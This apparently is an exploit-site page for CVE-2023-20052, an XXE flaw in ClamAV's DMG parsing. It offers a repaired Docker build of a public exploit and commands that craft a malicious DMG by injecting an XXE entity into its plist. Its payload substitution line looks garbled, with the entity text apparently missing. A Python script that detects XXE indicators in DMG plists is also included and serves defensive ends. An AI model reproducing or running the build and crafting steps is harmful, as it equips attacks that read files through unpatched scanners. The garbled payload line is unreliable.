## https://sploitus.com/exploit?id=96FCEE45-656A-5F86-AE56-904C1A48A17A
# CVE-2023-20052 Exploit - Fixed Build
Fixed Docker build for CVE-2023-20052 (ClamAV XXE vulnerability) that actually compiles.
## What Was Broken
The original exploit fails to build on modern systems:
- ❌ OpenSSL 3.0 compatibility errors
- ❌ `HMAC_CTX` struct incomplete type errors
- ❌ Implicit function declaration errors
- ❌ Build fails at `dmg/filevault.c` compilation
## What I Fixed
1. **Changed base image**: Ubuntu 22.04 → Ubuntu 18.04
2. **Fixed OpenSSL version**: Uses `libssl1.0-dev` (OpenSSL 1.0)
3. **Added non-interactive mode**: Prevents build prompts
4. **Working Dockerfile**: Actually compiles successfully
## Why This Works
`libdmg-hfsplus` uses deprecated OpenSSL 1.0 functions:
- `HMAC_CTX_init()` / `HMAC_CTX_cleanup()` (removed in OpenSSL 1.1+)
- Direct `HMAC_CTX` struct usage (opaque in OpenSSL 1.1+)
Ubuntu 18.04 is the last Ubuntu LTS release that still ships an OpenSSL 1.0 development package (`libssl1.0-dev`).
## Build & Usage
```bash
# Build (takes ~3-5 minutes)
docker build -t cve-2023-20052 .
# Run
docker run -v "$(pwd)":/exploit -it cve-2023-20052 bash
# Create exploit DMG
genisoimage -D -V "exploit" -no-pad -r -apple -o test.img .
dmg dmg test.img test.dmg
bbe -e 's|| ]>|' -e 's/blkx/&xxe;/' test.dmg -o exploit.dmg
```
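A defender-side check for the kind of artefact the last step produces, added here as an example and not part of the original repository: it reads the DMG's UDIF `koly` trailer (big-endian XML offset and length at trailer bytes 216 and 224), extracts the embedded XML plist and flags external entity declarations or an internal DTD subset, neither of which the plist written by the `dmg` tool contains. The `build_dmg` fixture and both sample plists are constructed for the demonstration.

```python
import re
import struct
from typing import Optional

KOLY_SIZE = 512  # the UDIF "koly" trailer is the last 512 bytes of a DMG


def read_koly_xml(dmg: bytes) -> Optional[bytes]:
    """Return the XML plist the koly trailer points at, or None if absent/malformed."""
    if len(dmg) < KOLY_SIZE:
        return None
    trailer = dmg[-KOLY_SIZE:]
    if trailer[:4] != b"koly":
        return None
    # XML offset and XML length: two big-endian u64 at trailer offsets 216 and 224
    xml_off, xml_len = struct.unpack(">QQ", trailer[216:232])
    if xml_off + xml_len > len(dmg) - KOLY_SIZE:
        return None  # plist would run into the trailer or past the file end
    return dmg[xml_off:xml_off + xml_len]


# XXE tell-tales: an entity declared with an external identifier, or a DOCTYPE
# that opens an internal subset ("[") where inline entities can be declared.
EXTERNAL_ENTITY = re.compile(rb"<!ENTITY\s+\S+\s+(SYSTEM|PUBLIC)\b", re.I)
INTERNAL_SUBSET = re.compile(rb"<!DOCTYPE[^>]*\[", re.I)


def has_xxe_indicators(dmg: bytes) -> bool:
    """True when the DMG's embedded plist carries entity declarations a stock plist never needs."""
    xml = read_koly_xml(dmg)
    if xml is None:
        return False
    return bool(EXTERNAL_ENTITY.search(xml) or INTERNAL_SUBSET.search(xml))


def build_dmg(plist: bytes) -> bytes:
    """Constructed fixture: one data byte, then the plist, then a koly trailer pointing at it."""
    data = b"\x00"
    trailer = bytearray(KOLY_SIZE)
    trailer[:4] = b"koly"
    trailer[216:232] = struct.pack(">QQ", len(data), len(plist))
    return data + plist + bytes(trailer)


# Constructed samples: the normal Apple plist DOCTYPE versus an injected internal subset.
BENIGN = build_dmg(b'<?xml version="1.0"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
                   b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist><dict><key>blkx</key></dict></plist>')
SUSPECT = build_dmg(b'<?xml version="1.0"?><!DOCTYPE plist [<!ENTITY xxe SYSTEM "file:///constructed/placeholder">]>'
                    b'<plist><dict><key>&xxe;</key></dict></plist>')

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, "XXE indicators:", has_xxe_indicators(blob))
```

Run it against a real image by reading the file into `has_xxe_indicators`; a hit is worth quarantining before an unpatched scanner parses the plist.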
## Credits
- Original exploit: [nokn0wthing/CVE-2023-20052](https://github.com/nokn0wthing/CVE-2023-20052)
- Fixed by: https://reapsec.com